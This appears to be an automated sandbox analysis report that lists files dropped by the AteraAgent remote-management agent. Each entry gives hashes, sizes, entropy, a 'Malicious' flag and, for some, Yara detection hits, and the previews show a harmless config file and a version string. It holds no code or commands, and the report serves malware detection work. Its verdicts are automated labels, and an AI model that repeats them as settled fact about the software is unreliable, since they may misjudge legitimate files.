                                                                                                                                                                                                                                        SHA-512:D6A709FE90FC22AA2C54114E0A12E7C9911F1C89B77DD36DD6D3371FDCBD8963180879BEA2E93863A0CA5664E486EB7F057D4C36AAF1640F24D7A44C144CF0F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.7788582069292636
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cCc6cYxmPlW7TW5KhNyby2sE9jBF6IYiYF8pA5K+oCGUHFFr9I+lt7:pTyW7TWWNyb8E9VF6IYinAM+oCRr9r7
                                                                                                                                                                                                                                        MD5:350269AA965975EFA1F84E0090CD37B3
                                                                                                                                                                                                                                        SHA1:B355FB69FCB00C23E456CFB19F865CA6CFFF38FB
                                                                                                                                                                                                                                        SHA-256:88E31C83F3826888B5838DFDB4507AE642F4BB9F39D53E03C15EEF68923306A3
                                                                                                                                                                                                                                        SHA-512:6681A60159795220B9A346B01A4EA9E7AD9E67FC1B717AB0A68B9BB8F5DAD3D84250E6EFD774FE8639F7292934B1A7C586F64D7643B7FA4E528670E5D0195DD6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.907751586883936
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T6Rb32WVzW+Nyb8E9VF6IYinAM+oC0WmSv2:WRb3dfEpYinAMxCwSv2
                                                                                                                                                                                                                                        MD5:8025A24F4FDE9436715579E7B2193331
                                                                                                                                                                                                                                        SHA1:B8B111882ECB33F590A009FF3B5019F20D10A31F
                                                                                                                                                                                                                                        SHA-256:E7BAA99C670C4AC1FF575202B6BC75E502A32DAE1CFAD930A54E0BA1E40CF9EC
                                                                                                                                                                                                                                        SHA-512:5C50CCD385DFD2ACD255F7989E3FF4AE62AE9F946B1AA79BE19B90D4FB1B96B56865D2B4CAB03F18D17768AB7CF2BB5DFB763688C50B978E430E430D3CF5A425
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31792
                                                                                                                                                                                                                                        Entropy (8bit):6.537336955673988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Xu5I+sqOylryry8qqIfUc7a5FEpYinAMxCGDh:XYIVBpry8qqIfUcm5e7HxHDh
                                                                                                                                                                                                                                        MD5:CA48177CFBAAFB80752B689E20BABBF1
                                                                                                                                                                                                                                        SHA1:AF58FA81B11BEF5230F11B3FC0FAE27A9EED84CF
                                                                                                                                                                                                                                        SHA-256:78FCE2D61B3F8108CE1AB3F707EEFFDB20B57152C0232777966FC2052912D5DC
                                                                                                                                                                                                                                        SHA-512:D1D22555134487044EA748F30BD7E6A81F24C98BE4E13E01B3910464C705BEB9421B7B44E7F68DC05E19DCF788A87F470A59FEA187396C1759F54065F976E0AC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8748413710554495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:gvn4HREpWiQWRNyb8E9VF6IYinAM+oCeWD6Lbc:3SLEpYinAMxCp
                                                                                                                                                                                                                                        MD5:7593FE4FFADE8375016FC24FA75A124B
                                                                                                                                                                                                                                        SHA1:8B765B636F47699C61966581658592019E3AC6C4
                                                                                                                                                                                                                                        SHA-256:A750DD59F7D9D19CEB1B405077D88FD3D63F07AC471731964F59C2396A0C533C
                                                                                                                                                                                                                                        SHA-512:A4B0F7B8134801BC771A4BC88D48B40CF9883C0B555134B4C65C966064B5FEE90DF7AF9044B58F84FB593AC76AEA1169BFCE9DDA66E7B3EA94F5F40A123E0A50
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.774247704930313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:98MjKb47T3UCcqFMkJ59WdtW0Nyb8E9VF6IYinAM+oCowQA1vM:GMjKb4vcGdOfEpYinAMxCAA1U
                                                                                                                                                                                                                                        MD5:A35A30B12348BA5E05B6FB159C563A7A
                                                                                                                                                                                                                                        SHA1:A67E4721114CC284D4EE2161B54BD65BE8838732
                                                                                                                                                                                                                                        SHA-256:C80EF950CBB2E2AE4E9430E6EA108DB3363E65ED38E8B016697D22C277F1718B
                                                                                                                                                                                                                                        SHA-512:16FED055DF80510D2564AADB18092A48725D64CCFE22E09EE546CB0EC0606FB0458A14FADD1D6044AA9E553190A90D41B72F356DFAD2927520334443AC717F45
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.853352008212058
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:LxzyNXd4+BW6FW9Nyb8E9VF6IYinAM+oCDYhYiKm:wzKEpYinAMxCcl
                                                                                                                                                                                                                                        MD5:7EBB896ED8D94BA34011FDB83579A930
                                                                                                                                                                                                                                        SHA1:63E1E9C4345D9F62F2F2CFA62D4682275800AD25
                                                                                                                                                                                                                                        SHA-256:FB1A1AC8A0325C137FB6C6528E03EABE16FE579C48F7B0572A0038C67B961083
                                                                                                                                                                                                                                        SHA-512:E6C8FC288936E849FD34DD53C39D1ED221E68877AFC3D51FA75956AA3D664B4A8C9DABF9381F5645CDF4C543D5F9102043259E9D77C2129FD4E7B2CA7B4EDF3C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.862515945758667
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:8vs2Q3HKJNrWWRWS6Nyb8E9VF6IYinAM+oCm86DVYp:8uMmEpYinAMxCPuVYp
                                                                                                                                                                                                                                        MD5:73471841E080DD85920871105EB76D3C
                                                                                                                                                                                                                                        SHA1:A01C4C31162919DA9489DB5F26DFD740019F1D69
                                                                                                                                                                                                                                        SHA-256:A768CF40C860A92A2C9C7DB1D9D5B15708C01D14AC6EB6C42EC47A6E520E8000
                                                                                                                                                                                                                                        SHA-512:3247093C549594605AD3D6E1FACDA4BD4F47FDC3B12475B5302083B58C6FF3757EEBD54CFE36627CBECD1C9AC07F74E72758A802E5B9DDC473F39AE9A8F57A8C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.827884602631064
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yFz0Q6gcqRhcsMWdMWtNyb8E9VF6IYinAM+oC9JtVeCM:yFz1c6jEpYinAMxCLKCM
                                                                                                                                                                                                                                        MD5:0163F439542B0F429D38F8C5F11AB553
                                                                                                                                                                                                                                        SHA1:19B75CBD6BE631B908B6DA2257CF157D64F24495
                                                                                                                                                                                                                                        SHA-256:22CC23E704A625F0778AE9785319BB5EF0CF2C76325AB972609B7BED14938D08
                                                                                                                                                                                                                                        SHA-512:3C60B4F0A6B746C024336683799D79A53D22E1A525BCCE9FD5893731787BF2EFCF9B8328941F92C518706B2129082FBBC993E4FCD5B1025AD81A145B1EE0A0FF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.72146155788329
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:q6xWA3W4aW/NWgNyb8E9VF6IYinAM+oCIJTOF:qaBbEpYinAMxCb
                                                                                                                                                                                                                                        MD5:1B6967DF51A28EF4C6BF9200D0DC8F6B
                                                                                                                                                                                                                                        SHA1:4038087307E3AE7538C8352E7BC18A5FD3E219E8
                                                                                                                                                                                                                                        SHA-256:BDED189EF167AA4D3F9D79C7A859D0E3C25D3374E1FDDB26758522133BC0FBBC
                                                                                                                                                                                                                                        SHA-512:F352B617C6F0D385B9D2E110A310BDBEEDBC2F2B978949F854A6D9B19CB3925DA48A7467DBB8C6450F32ECBC0F92D3A11D861559884D912B822BDFBB0FCB417F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95534184969142
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:h784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRT:h7N1r9KGI04CCARLT
                                                                                                                                                                                                                                        MD5:B810DC7054B683366C39DB3C68F04F7B
                                                                                                                                                                                                                                        SHA1:014B5F1A6A1DE8172BCEA4B025A3161AB5BA3A44
                                                                                                                                                                                                                                        SHA-256:E80F800AB85D8E9FB1ED5E541E3E5617D2F4AE7CFF58804C1CDDF64FDBF64431
                                                                                                                                                                                                                                        SHA-512:9A471F0D9E0EA6C4A898E7D47BCCBC2AE614C942A5A53CB17DF1846403B6157C993C59237A8A7572349018F4DE58EA3830BBB30B4BF368D430AF60E32ABCE86D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.853619147211277
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Wr97WquWeNyb8E9VF6IYinAM+oCkp9Kbs:WRJWEpYinAMxCeb
                                                                                                                                                                                                                                        MD5:AED9C71AD86BF0F3CF92A98827956EFF
                                                                                                                                                                                                                                        SHA1:C77E1CF1F57A316D29465971056C6DED650419AC
                                                                                                                                                                                                                                        SHA-256:BD01AEBE7C4FA2CE93D8FAF8822582C41F307275DCC60FF1C8B445CB7E640DE5
                                                                                                                                                                                                                                        SHA-512:C0A357336DE4623527BFE1CC8B098C001CAFDAAF4913CD18F14FE9C623B677FF7554852540A700387D51596593124EC47739434CD91071E989040341A8BBBBE5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.794476772281384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cjh2uxSleWLDW528BNyby2sE9jBF6IYiYF8pA5K+oCGUHFMslQ/:q16eWLDW1Nyb8E9VF6IYinAM+oC4D/
                                                                                                                                                                                                                                        MD5:AC3E06E0163098D50D9621FB59D10BFD
                                                                                                                                                                                                                                        SHA1:6A02C8D6263A26FA6C09F8E58A97D8C854BA1974
                                                                                                                                                                                                                                        SHA-256:9D1F390541E7E7CC9622EAE0D68D0E7A365A65475B25B20613A7EA84598376D3
                                                                                                                                                                                                                                        SHA-512:D7AB3FAF2E9D2DE9C5C7FA673BEE155B6ADD81D72A32F81448DE2282B8F22C1E11FE3BEF5C8678777D73E31DAAE0535C8EFADEF6B2323D5125E4A535B87C96AB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.785165019486056
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T8G4YC2W+wW8WpwW3Nyb8E9VF6IYinAM+oCPuq:wGZ5ZEpYinAMxCN
                                                                                                                                                                                                                                        MD5:58976034EAC709E05B03CA0B3B520F20
                                                                                                                                                                                                                                        SHA1:4ED412379D6CECC6596F8F31923D905D82B24B64
                                                                                                                                                                                                                                        SHA-256:100E35546DB8A7C92CFCF8D7E814A33B3B38D48AD9757A113E23B2888BAA4225
                                                                                                                                                                                                                                        SHA-512:FBAE6F4A4F6EC679E1B13C798AF1C17696DA1073ED321F02EF7ED0E7CFA821F0F0BFDB6B485D0BBE4497E250CEADC7C1B682DAA61192C486C29B4807446F1AD7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.899058511351578
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:M6ziqTEkGWvRWpNyb8E9VF6IYinAM+oCKPnYe:MYT1yEpYinAMxC0Ye
                                                                                                                                                                                                                                        MD5:57078D673B07AB2185173F352190C235
                                                                                                                                                                                                                                        SHA1:B17BD3197C3D65EFD83A18B8F09A2EB1C315D21F
                                                                                                                                                                                                                                        SHA-256:BE8703E8549EA343D78DE7BA0F0EF13E6CD559C49955044AA917B55541D5202C
                                                                                                                                                                                                                                        SHA-512:768B09514F8B4CED74E6933D8A7AE705DCCD752F05A8EADCFE99C75920408A0F5DD196657FDA1B9F340A9A8219C078CD21A0BA4E19D50B44B13315210888B32C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.810619804319302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lUv7c7iWNCW9Nyb8E9VF6IYinAM+oCIL1LZt:lM7c1VEpYinAMxC0F
                                                                                                                                                                                                                                        MD5:1BFF387D9F5BFEEEE4319871EBFFEF84
                                                                                                                                                                                                                                        SHA1:2332D3CECECAF5DA3EEA77CA8E46509E35885B95
                                                                                                                                                                                                                                        SHA-256:3419A5024F04B35A9DC4B3F47B7298F91E5ED75EEC32BDBFDCAF9DBD284446A5
                                                                                                                                                                                                                                        SHA-512:62E29623AB42F1C12D16D81F42EB8D117680192E3D49F7F243B749EE05062CB644307B66402CBFDAE8AA1B69A4ED5C6A6CEF58D92479AD07C1DEA3417ACC041E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.85218850025618
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:G+vxmNWnRW5x+Nyby2sE9jBF6IYiYF8pA5K+oCGUHF8C8cA/z6HSLo:HSWnRWmNyb8E9VF6IYinAM+oCIj/z6T
                                                                                                                                                                                                                                        MD5:0DB58E596FE39F8BE1B3E1B0BCC7B63B
                                                                                                                                                                                                                                        SHA1:088172606BA618FFEFED1FC6F2C1F84BF67C2189
                                                                                                                                                                                                                                        SHA-256:92E3FC8AF59B3323D025CF2FB7AE00AAB9A7B91DB8C737E3A2FA0C3E76A0FAEA
                                                                                                                                                                                                                                        SHA-512:1FF2C9B0367B6CAA410755D8F0B5A40CD89976E4E79F913CFE528593107D4A55B4B54DFE50A628E72957B137F53D16363F10EF45E0A129673B0EC0CA9912002D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):92720
                                                                                                                                                                                                                                        Entropy (8bit):5.48315242734429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:w2Ec05j4eAH64rh5fSt5T9nFcI94WX7HxR:HlK4eA7mDmWXH
                                                                                                                                                                                                                                        MD5:DD3F6AE7E0F87A462F2FE0F30CA2B843
                                                                                                                                                                                                                                        SHA1:34367ACE1A01B9A1651FC2D786BC1DB32DCC84BB
                                                                                                                                                                                                                                        SHA-256:455B74FB7473EF4430101FF9E0153FA18314169C4C6BA308ACCFAEFDB0A20813
                                                                                                                                                                                                                                        SHA-512:B1E3934EF308654DCDAA15D91D30CED737CE8C95A36B5DEDDE4C92A9AEFEDB8E030100052181CFEFF01E95A0487AD6B2D6F54E66EFB18B5E3826D86FDD628A7D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2726754
                                                                                                                                                                                                                                        Entropy (8bit):7.999925670485869
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:zF3WpEHlv0gZy1QXPfME8e6S+DYhVB0JT+fYiLdr53rMCAaq0qYmT:JWWFv3Zyqffhb+Dx9ilpM7a6lT
                                                                                                                                                                                                                                        MD5:61CC7ACFF5BC3AC89753484346B067F9
                                                                                                                                                                                                                                        SHA1:074D7EB031396E6D58405054CFC7BC1F4A9F6894
                                                                                                                                                                                                                                        SHA-256:B4D2703AFD0180503CF495D69A8B4452EF864F061B4C760DEFEAAD7AE777FF27
                                                                                                                                                                                                                                        SHA-512:DAB984DDED857DFC7890F9F98D22BC7EEB85E1B6297BD84FE2326198AB59F35B709B97B0CC49243413F35CC9EE8FC65B1C9447DADAD001ECD40FF5F2E457EA97
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55856
                                                                                                                                                                                                                                        Entropy (8bit):6.199458600254432
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:2lEOJ1UHxhj7UenAVe79k7Rm7Bl77HxPp4:2lEOJ18j4enAsZARsr7lp4
                                                                                                                                                                                                                                        MD5:E32856BEF4126DF5FB008E0EC9E7A3DD
                                                                                                                                                                                                                                        SHA1:FD80C9EC6CD3D1D2CCA526CA6B21B406D166495C
                                                                                                                                                                                                                                        SHA-256:8B397E29048F63589CDD028F732468F17684F5B0051752C73F1C240B76392D48
                                                                                                                                                                                                                                        SHA-512:E904F65282A579E50DED632B0EA8A783FFE3D1687FE27D4AA82BF5B44993D23F4C038C3B60CECB00AEE4D05624B894F87595988883467B70C3CDE37C77626C0A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                        Entropy (8bit):5.037356665456624
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VYF9LNFF7ap+58hOf/2//3QOFip+5v5OXrRf/2//FicYo4xT:JdszvPF7N8OH2//3dVhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:336CAA70D9EF388EDF8B234E5FC40CEE
                                                                                                                                                                                                                                        SHA1:864CCB7643FC99313E5ACBEB59D608CD179E01BB
                                                                                                                                                                                                                                        SHA-256:9BB07566C5CEAF46CFC1164A63553BB3C00AD8A04138211C6EBA81B60F4FE355
                                                                                                                                                                                                                                        SHA-512:EB037FF55C7D61A4170A9143B7BA40CC43DDBC9E8DF673D7AF03548C27C4410F53A5CDFAFE8942559B9E5061419512F3C8FAA5A6D32ED147DD33F832CF43E637
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXRLc:WBRo
                                                                                                                                                                                                                                        MD5:6ABCEAE033B83A5035C535EC04A49AEF
                                                                                                                                                                                                                                        SHA1:DBE39A40FAFB5C1BB855E44B63283C8E76138469
                                                                                                                                                                                                                                        SHA-256:05D2DDB7C93FE7DA11090E743DB751374096BA8932439B7E78568695D5CCE60E
                                                                                                                                                                                                                                        SHA-512:7A6DEC40D772CF313C0A4969D5D970E1B059C21D42578C2DE734396AE76382E6CC21A986AD31810847AC41F61D081C41468F3E7EE4736A6163E59CA24DECD8D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=24.9
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.18082685423375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:NJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJd/50vks00UfafgVU7HxLr:NQUm2H5KTfOLgxFJj550vksVUfhVUhr
                                                                                                                                                                                                                                        MD5:FFE10928C552F5A216D1A361B89BB1BC
                                                                                                                                                                                                                                        SHA1:9524CEEA59E85C6782949B02578176FCE0492D27
                                                                                                                                                                                                                                        SHA-256:C715F651479984383812AF42F6A8482CF90E277F21DF07CEAB9BB3F6775CDD8E
                                                                                                                                                                                                                                        SHA-512:FF66A15F8ABE8B42C997ADAD8707083DFC8451A088FDA8641792A21AED40E9F5B079710A6F54EA73866DF084E8BB9696454897E78A8845E7FD9ACCFE9F3BB48D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):670
                                                                                                                                                                                                                                        Entropy (8bit):4.870186870231866
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5lh3rwhI4IaMFj27/tUYCQpU0E+dqo6rHQknd77psLlO:l334IaJUuU0E+QHQk17psLlO
                                                                                                                                                                                                                                        MD5:B4ECFC2FF4822CE40435ADA0A02D4EC5
                                                                                                                                                                                                                                        SHA1:8AAF3F290D08011ADE263F8A3AB4FE08ECDE2B64
                                                                                                                                                                                                                                        SHA-256:A42AC97C0186E34BDC5F5A7D87D00A424754592F0EC80B522A872D630C1E870A
                                                                                                                                                                                                                                        SHA-512:EAFAC709BE29D5730CB4ECD16E1C9C281F399492C183D05CC5093D3853CDA7570E6B9385FBC80A40FF960B5A53DAE6AE1F01FC218E60234F7ADCED6DCCBD6A43
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
